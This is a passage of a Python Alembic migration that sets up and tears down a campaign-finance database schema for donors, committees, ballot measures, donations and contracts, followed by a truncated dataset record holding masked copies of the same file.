)
op.create_index('ix_stance_ballot_measure_id', 'stance', ['ballot_measure_id'], unique=False)
op.create_index('ix_stance_committee_id', 'stance', ['committee_id'], unique=False)
op.create_table(u'ballot_measure_tags',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('ballot_measure_id', postgresql.UUID(), nullable=False),
sa.Column('tag_id', postgresql.UUID(), nullable=False),
sa.ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id'], ),
sa.ForeignKeyConstraint(['tag_id'], [u'tag.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('ballot_measure_id','tag_id')
)
op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags', ['tag_id'], unique=False)
op.create_index('ix_ballot_measure_tags_ballot_measure_id', 'ballot_measure_tags', ['ballot_measure_id'], unique=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_index('ix_ballot_measure_tags_ballot_measure_id', 'ballot_measure_tags')
op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')
op.drop_table(u'ballot_measure_tags')
op.drop_index('ix_stance_committee_id', 'stance')
op.drop_index('ix_stance_ballot_measure_id', 'stance')
op.drop_table(u'stance')
op.drop_index('ix_contract_committee_id', 'contract')
op.drop_index('ix_contract_service_id', 'contract')
op.drop_index('ix_contract_consultant_id', 'contract')
op.drop_table(u'contract')
op.drop_index('ix_donation_donor_id', 'donation')
op.drop_index('ix_donation_committee_id', 'donation')
op.drop_table(u'donation')
op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')
op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')
op.drop_table(u'ballot_measure')
op.drop_index('ix_committee_election_id', 'committee')
op.drop_table(u'committee')
op.drop_index('ix_donor_employer_id', 'donor')
op.drop_table(u'donor')
op.drop_table(u'election')
op.drop_table(u'tag')
op.drop_table(u'employer')
op.drop_table(u'ballot_type')
op.drop_table(u'service')
op.drop_table(u'consultant')
### end Alembic commands ###
|
normal
|
{
"blob_id": "7df55853d0f4f1bf56512c4427d7f91e9c1f2279",
"index": 6524,
"step-1": "<mask token>\n\n\ndef downgrade():\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 'donation')\n op.drop_table(u'donation')\n op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n op.create_table(u'consultant', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('address', sa.Text(), nullable=\n True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'service', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('description', sa.Text(),\n nullable=True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'ballot_type', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('percent_required', sa.Numeric(\n precision=2, scale=2), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'employer', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'tag', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'election', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('date', sa.\n Date(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'donor', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('first_name',\n sa.Text(), nullable=False), sa.Column('last_name', sa.Text(),\n nullable=False), sa.Column('address', sa.Text(), nullable=False),\n sa.Column('latitude', sa.Float(), nullable=False), sa.Column(\n 'longitude', sa.Float(), nullable=False), sa.Column('employer_id',\n postgresql.UUID(), nullable=True), sa.ForeignKeyConstraint([\n 'employer_id'], [u'employer.id']), sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('first_name', 'last_name', 'latitude', 'longitude')\n )\n op.create_index('ix_donor_employer_id', 'donor', ['employer_id'],\n unique=False)\n op.create_table(u'committee', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('filer_id', sa.Text(), nullable=\n True), sa.Column('sponsor', sa.Text(), nullable=True), sa.Column(\n 'election_id', postgresql.UUID(), nullable=True), sa.\n ForeignKeyConstraint(['election_id'], [u'election.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_committee_election_id', 'committee', ['election_id'\n ], unique=False)\n op.create_table(u'ballot_measure', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=True), sa.Column('prop_id', sa.Text(), nullable=\n False), sa.Column('description', sa.Text(), nullable=True), sa.\n Column('num_yes', sa.Integer(), nullable=True), sa.Column('num_no',\n sa.Integer(), nullable=True), sa.Column('passed', sa.Boolean(),\n nullable=True), sa.Column('ballot_type_id', postgresql.UUID(),\n nullable=True), sa.Column('election_id', postgresql.UUID(),\n nullable=True), sa.ForeignKeyConstraint(['ballot_type_id'], [\n u'ballot_type.id']), sa.ForeignKeyConstraint(['election_id'], [\n u'election.id']), sa.PrimaryKeyConstraint('id'))\n op.create_index('ix_ballot_measure_election_id', 'ballot_measure', [\n 'election_id'], unique=False)\n op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', [\n 'ballot_type_id'], unique=False)\n op.create_table(u'donation', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('amount', sa.\n Float(), nullable=False), sa.Column('transaction_date', sa.Date(),\n nullable=False), sa.Column('donor_id', postgresql.UUID(), nullable=\n False), sa.Column('committee_id', postgresql.UUID(), nullable=False\n ), sa.ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa\n .ForeignKeyConstraint(['donor_id'], [u'donor.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_donation_committee_id', 'donation', ['committee_id'\n ], unique=False)\n op.create_index('ix_donation_donor_id', 'donation', ['donor_id'],\n unique=False)\n op.create_table(u'contract', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('payment', sa\n .Float(), nullable=False), sa.Column('consultant_id', postgresql.\n UUID(), nullable=False), sa.Column('service_id', postgresql.UUID(),\n nullable=True), sa.Column('description', sa.Text(), nullable=True),\n sa.Column('committee_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n ForeignKeyConstraint(['consultant_id'], [u'consultant.id']), sa.\n ForeignKeyConstraint(['service_id'], [u'service.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_contract_consultant_id', 'contract', [\n 'consultant_id'], unique=False)\n op.create_index('ix_contract_service_id', 'contract', ['service_id'],\n unique=False)\n op.create_index('ix_contract_committee_id', 'contract', ['committee_id'\n ], unique=False)\n op.create_table(u'stance', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('voted_yes',\n sa.Boolean(), nullable=False), sa.Column('committee_id', postgresql\n .UUID(), nullable=False), sa.Column('ballot_measure_id', postgresql\n .UUID(), nullable=False), sa.ForeignKeyConstraint([\n 'ballot_measure_id'], [u'ballot_measure.id']), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('committee_id',\n 'ballot_measure_id'))\n op.create_index('ix_stance_ballot_measure_id', 'stance', [\n 'ballot_measure_id'], unique=False)\n op.create_index('ix_stance_committee_id', 'stance', ['committee_id'],\n unique=False)\n op.create_table(u'ballot_measure_tags', sa.Column('id', postgresql.UUID\n (), server_default=func.uuid_generate_v4(), nullable=False), sa.\n Column('created', sa.DateTime(timezone=True), server_default=func.\n now(), nullable=False), sa.Column('updated', sa.DateTime(timezone=\n True), server_default=func.now(), nullable=False), sa.Column(\n 'ballot_measure_id', postgresql.UUID(), nullable=False), sa.Column(\n 'tag_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id']),\n sa.ForeignKeyConstraint(['tag_id'], [u'tag.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('ballot_measure_id',\n 'tag_id'))\n op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags',\n ['tag_id'], unique=False)\n op.create_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags', ['ballot_measure_id'], unique=False)\n\n\ndef downgrade():\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 'donation')\n op.drop_table(u'donation')\n op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n",
"step-3": "<mask token>\nrevision = '1f2296edbc75'\ndown_revision = '7417382a3f1'\n<mask token>\n\n\ndef upgrade():\n op.create_table(u'consultant', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('address', sa.Text(), nullable=\n True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'service', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('description', sa.Text(),\n nullable=True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'ballot_type', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('percent_required', sa.Numeric(\n precision=2, scale=2), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'employer', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'tag', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'election', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('date', sa.\n Date(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'donor', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('first_name',\n sa.Text(), nullable=False), sa.Column('last_name', sa.Text(),\n nullable=False), sa.Column('address', sa.Text(), nullable=False),\n sa.Column('latitude', sa.Float(), nullable=False), sa.Column(\n 'longitude', sa.Float(), nullable=False), sa.Column('employer_id',\n postgresql.UUID(), nullable=True), sa.ForeignKeyConstraint([\n 'employer_id'], [u'employer.id']), sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('first_name', 'last_name', 'latitude', 'longitude')\n )\n op.create_index('ix_donor_employer_id', 'donor', ['employer_id'],\n unique=False)\n op.create_table(u'committee', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('filer_id', sa.Text(), nullable=\n True), sa.Column('sponsor', sa.Text(), nullable=True), sa.Column(\n 'election_id', postgresql.UUID(), nullable=True), sa.\n ForeignKeyConstraint(['election_id'], [u'election.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_committee_election_id', 'committee', ['election_id'\n ], unique=False)\n op.create_table(u'ballot_measure', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=True), sa.Column('prop_id', sa.Text(), nullable=\n False), sa.Column('description', sa.Text(), nullable=True), sa.\n Column('num_yes', sa.Integer(), nullable=True), sa.Column('num_no',\n sa.Integer(), nullable=True), sa.Column('passed', sa.Boolean(),\n nullable=True), sa.Column('ballot_type_id', postgresql.UUID(),\n nullable=True), sa.Column('election_id', postgresql.UUID(),\n nullable=True), sa.ForeignKeyConstraint(['ballot_type_id'], [\n u'ballot_type.id']), sa.ForeignKeyConstraint(['election_id'], [\n u'election.id']), sa.PrimaryKeyConstraint('id'))\n op.create_index('ix_ballot_measure_election_id', 'ballot_measure', [\n 'election_id'], unique=False)\n op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', [\n 'ballot_type_id'], unique=False)\n op.create_table(u'donation', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('amount', sa.\n Float(), nullable=False), sa.Column('transaction_date', sa.Date(),\n nullable=False), sa.Column('donor_id', postgresql.UUID(), nullable=\n False), sa.Column('committee_id', postgresql.UUID(), nullable=False\n ), sa.ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa\n .ForeignKeyConstraint(['donor_id'], [u'donor.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_donation_committee_id', 'donation', ['committee_id'\n ], unique=False)\n op.create_index('ix_donation_donor_id', 'donation', ['donor_id'],\n unique=False)\n op.create_table(u'contract', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('payment', sa\n .Float(), nullable=False), sa.Column('consultant_id', postgresql.\n UUID(), nullable=False), sa.Column('service_id', postgresql.UUID(),\n nullable=True), sa.Column('description', sa.Text(), nullable=True),\n sa.Column('committee_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n ForeignKeyConstraint(['consultant_id'], [u'consultant.id']), sa.\n ForeignKeyConstraint(['service_id'], [u'service.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_contract_consultant_id', 'contract', [\n 'consultant_id'], unique=False)\n op.create_index('ix_contract_service_id', 'contract', ['service_id'],\n unique=False)\n op.create_index('ix_contract_committee_id', 'contract', ['committee_id'\n ], unique=False)\n op.create_table(u'stance', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('voted_yes',\n sa.Boolean(), nullable=False), sa.Column('committee_id', postgresql\n .UUID(), nullable=False), sa.Column('ballot_measure_id', postgresql\n .UUID(), nullable=False), sa.ForeignKeyConstraint([\n 'ballot_measure_id'], [u'ballot_measure.id']), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('committee_id',\n 'ballot_measure_id'))\n op.create_index('ix_stance_ballot_measure_id', 'stance', [\n 'ballot_measure_id'], unique=False)\n op.create_index('ix_stance_committee_id', 'stance', ['committee_id'],\n unique=False)\n op.create_table(u'ballot_measure_tags', sa.Column('id', postgresql.UUID\n (), server_default=func.uuid_generate_v4(), nullable=False), sa.\n Column('created', sa.DateTime(timezone=True), server_default=func.\n now(), nullable=False), sa.Column('updated', sa.DateTime(timezone=\n True), server_default=func.now(), nullable=False), sa.Column(\n 'ballot_measure_id', postgresql.UUID(), nullable=False), sa.Column(\n 'tag_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id']),\n sa.ForeignKeyConstraint(['tag_id'], [u'tag.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('ballot_measure_id',\n 'tag_id'))\n op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags',\n ['tag_id'], unique=False)\n op.create_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags', ['ballot_measure_id'], unique=False)\n\n\ndef downgrade():\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 'donation')\n op.drop_table(u'donation')\n op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n",
"step-4": "<mask token>\nrevision = '1f2296edbc75'\ndown_revision = '7417382a3f1'\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nfrom sqlalchemy import func\n\n\ndef upgrade():\n op.create_table(u'consultant', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('address', sa.Text(), nullable=\n True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'service', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('description', sa.Text(),\n nullable=True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'ballot_type', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('percent_required', sa.Numeric(\n precision=2, scale=2), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'employer', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'tag', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'election', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('date', sa.\n Date(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'donor', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('first_name',\n sa.Text(), nullable=False), sa.Column('last_name', sa.Text(),\n nullable=False), sa.Column('address', sa.Text(), nullable=False),\n sa.Column('latitude', sa.Float(), nullable=False), sa.Column(\n 'longitude', sa.Float(), nullable=False), sa.Column('employer_id',\n postgresql.UUID(), nullable=True), sa.ForeignKeyConstraint([\n 'employer_id'], [u'employer.id']), sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('first_name', 'last_name', 'latitude', 'longitude')\n )\n op.create_index('ix_donor_employer_id', 'donor', ['employer_id'],\n unique=False)\n op.create_table(u'committee', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('filer_id', sa.Text(), nullable=\n True), sa.Column('sponsor', sa.Text(), nullable=True), sa.Column(\n 'election_id', postgresql.UUID(), nullable=True), sa.\n ForeignKeyConstraint(['election_id'], [u'election.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_committee_election_id', 'committee', ['election_id'\n ], unique=False)\n op.create_table(u'ballot_measure', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=True), sa.Column('prop_id', sa.Text(), nullable=\n False), sa.Column('description', sa.Text(), nullable=True), sa.\n Column('num_yes', sa.Integer(), nullable=True), sa.Column('num_no',\n sa.Integer(), nullable=True), sa.Column('passed', sa.Boolean(),\n nullable=True), sa.Column('ballot_type_id', postgresql.UUID(),\n nullable=True), sa.Column('election_id', postgresql.UUID(),\n nullable=True), sa.ForeignKeyConstraint(['ballot_type_id'], [\n u'ballot_type.id']), sa.ForeignKeyConstraint(['election_id'], [\n u'election.id']), sa.PrimaryKeyConstraint('id'))\n op.create_index('ix_ballot_measure_election_id', 'ballot_measure', [\n 'election_id'], unique=False)\n op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', [\n 'ballot_type_id'], unique=False)\n op.create_table(u'donation', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('amount', sa.\n Float(), nullable=False), sa.Column('transaction_date', sa.Date(),\n nullable=False), sa.Column('donor_id', postgresql.UUID(), nullable=\n False), sa.Column('committee_id', postgresql.UUID(), nullable=False\n ), sa.ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa\n .ForeignKeyConstraint(['donor_id'], [u'donor.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_donation_committee_id', 'donation', ['committee_id'\n ], unique=False)\n op.create_index('ix_donation_donor_id', 'donation', ['donor_id'],\n unique=False)\n op.create_table(u'contract', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('payment', sa\n .Float(), nullable=False), sa.Column('consultant_id', postgresql.\n UUID(), nullable=False), sa.Column('service_id', postgresql.UUID(),\n nullable=True), sa.Column('description', sa.Text(), nullable=True),\n sa.Column('committee_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n ForeignKeyConstraint(['consultant_id'], [u'consultant.id']), sa.\n ForeignKeyConstraint(['service_id'], [u'service.id']), sa.\n PrimaryKeyConstraint('id'))\n 